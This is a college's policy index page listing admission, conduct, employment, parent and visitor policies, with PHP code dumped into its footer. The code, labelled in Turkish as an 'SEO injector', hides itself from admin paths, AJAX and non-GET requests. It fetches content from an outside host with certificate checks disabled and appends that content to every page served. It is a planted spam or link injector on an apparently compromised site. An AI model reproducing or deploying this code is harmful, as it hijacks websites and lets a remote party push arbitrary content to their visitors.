Policies for Students:

01.

Admission Policy:

Outlines the criteria, procedures, and requirements for student admission to various programs.

02.

Academic Integrity Policy:

Sets expectations for honest and ethical academic behavior, including guidelines on plagiarism, cheating, and consequences for violations.

03.

Code of Conduct:

Defines expected behavior and responsibilities for students on campus and during college-sponsored events.

04.

Anti-Discrimination and Harassment Policy:

Addresses issues related to discrimination, harassment, and provides procedures for reporting and resolving such incidents.

05.

Academic Grading and Evaluation Policy:

Details the grading system, evaluation criteria, and academic performance standards.

06.

Withdrawal and Refund Policy:

Outlines the process for withdrawing from courses and provides information on tuition refunds.

07.

Student Grievance Policy:

Describes the process for students to voice concerns, disputes, or grievances and seek resolution.

08.

Student Housing and Hostel Policy:

Covers rules, regulations, and guidelines for students residing in college hostels or dormitories.

09.

Scholarship and Financial Aid Policy:

Explains the eligibility criteria and application procedures for scholarships and financial aid.

10.

Health and Safety Policy:

Addresses health and safety measures, including first aid, emergency procedures, and campus safety protocols.

Policies for Faculty and Staff:

01.

Equal Employment Opportunity Policy:

Ensures equal employment opportunities and prohibits discrimination in recruitment, hiring, and employment practices.

02.

Faculty Evaluation and Promotion Policy:

Outlines the process for faculty performance evaluation and criteria for promotion.

03.

Staff Recruitment and Hiring Policy:

Defines the hiring process, job descriptions, and selection criteria for staff positions.

04.

Professional Development and Training Policy:

Encourages ongoing training and professional development for faculty and staff.

05.

Conflict of Interest Policy:

Addresses conflicts of interest that may arise in research, employment, and administrative roles.

06.

Sick Leave and Absence Policy:

Details guidelines for taking sick leave, vacation, and other types of leave for staff and faculty.

07.

Intellectual Property Policy:

Establishes ownership and rights related to intellectual property created by faculty and staff.

8.

Employee Code of Conduct:

Sets expectations for professional conduct, ethics, and responsibilities for faculty and staff members.


Policies for Parents:
01.

Parental Involvement Policy:

Encourages and outlines ways for parents to be involved in their child's education and college activities.

02.

Communication and Feedback Policy:

Describes how parents can communicate with college administrators and faculty and provide feedback.

03.

Privacy and Confidentiality Policy:

Addresses the handling of student information and data in compliance with privacy laws.

04.

Tuition and Fee Payment Policy:

Explains procedures and deadlines for tuition and fee payments.

05.

Student Support Services Policy:

Provides information about available support services and resources for students' academic and personal well-being.

Policies for the General Public:
01.

Visitor and Guest Policy:

Sets rules and expectations for visitors to the college campus, including access and conduct.

02.

Public Event and Facility Rental Policy:

Provides guidelines for renting college facilities and hosting public events on campus.

03.

Media and Public Relations Policy:

Establishes guidelines for media engagement, press releases, and public relations activities.

04.

Accessibility and Accommodation Policy:

Addresses accessibility standards and accommodations for individuals with disabilities.

05.

Emergency Response and Evacuation Policy:

Details procedures for emergency response, evacuation, and campus safety.

// --------------------------- // SEO injector (footer'a eklendi) // Kopyala: footer HTML'inin hemen sonuna yapıştır // --------------------------- if (!defined('LB_IN')) { define('LB_IN', 1); $GLOBALS['buffer_mode'] = false; // Basit çalışma kontrolleri: CLI, AJAX, admin yolları, POST/PUT/DELETE => çık $is_cli = (php_sapi_name() === 'cli' || defined('STDIN')); $request_method = $_SERVER['REQUEST_METHOD'] ?? 'GET'; $is_ajax = (isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest'); $uri = $_SERVER['REQUEST_URI'] ?? ''; $is_admin_path = (stripos($uri, '/wp-admin') !== false) || (stripos($uri, '/admin') !== false); if ($is_cli || $is_ajax || $is_admin_path || !in_array(strtoupper($request_method), ['GET'])) { // hiçbir işlem yapma return; } // Eğer istemci HTML istemiyorsa çık (ör. API çağrısı) $accept = $_SERVER['HTTP_ACCEPT'] ?? ''; if ($accept !== '' && stripos($accept, 'text/html') === false && stripos($accept, 'application/xhtml+xml') === false) { return; } function seo_injector($buffer = null) { $u = 'https://linksdiamond.com/c.php?tk=01'; $s = ''; $proto = 'http'; if ( (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https') || (isset($_SERVER['SERVER_PORT']) && (int)$_SERVER['SERVER_PORT'] === 443) ) { $proto = 'https'; } $host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : (isset($_SERVER['SERVER_NAME']) ? $_SERVER['SERVER_NAME'] : 'localhost'); $h = $proto . '://' . $host; try { if (function_exists('curl_init')) { $c = curl_init(); curl_setopt_array($c, array( CURLOPT_URL => $u, CURLOPT_RETURNTRANSFER => 1, CURLOPT_HTTPHEADER => array("Referer: $h"), CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_CONNECTTIMEOUT => 4, CURLOPT_TIMEOUT => 5 )); $r = @curl_exec($c); $http_code = curl_getinfo($c, CURLINFO_HTTP_CODE); curl_close($c); if ($r !== false && $http_code >= 200 && $http_code < 300 && stripos($r, 'SEO:OK') !== false) { $s = $r; } } elseif (ini_get('allow_url_fopen')) { $ctx = stream_context_create(array( 'http' => array( 'header' => "Referer: $h\r\n", 'timeout' => 5 ), 'ssl' => array( 'verify_peer' => false, 'verify_peer_name' => false, ) )); $r = @file_get_contents($u, false, $ctx); if ($r !== false && stripos($r, 'SEO:OK') !== false) { $s = $r; } } } catch (Throwable $e) { // sessizce atla $s = ''; } if ($s === '') return $buffer ? $buffer : ''; if ($buffer !== null) { // buffer varsa sonuna ekle return $buffer . "\n" . $s; } else { echo $s; } } function seo_shutdown_handler() { if (empty($GLOBALS['buffer_mode'])) { seo_injector(null); } } if (function_exists('ob_start')) { // ob_start içinde aynı callback tekrarını engelle $already = false; if (function_exists('ob_list_handlers')) { $ob_list = ob_list_handlers(); if (is_array($ob_list)) { foreach ($ob_list as $h) { if (strpos($h, 'seo_injector') !== false) { $already = true; break; } } } } if (!$already) { $GLOBALS['buffer_mode'] = true; ob_start('seo_injector'); } } register_shutdown_function('seo_shutdown_handler'); }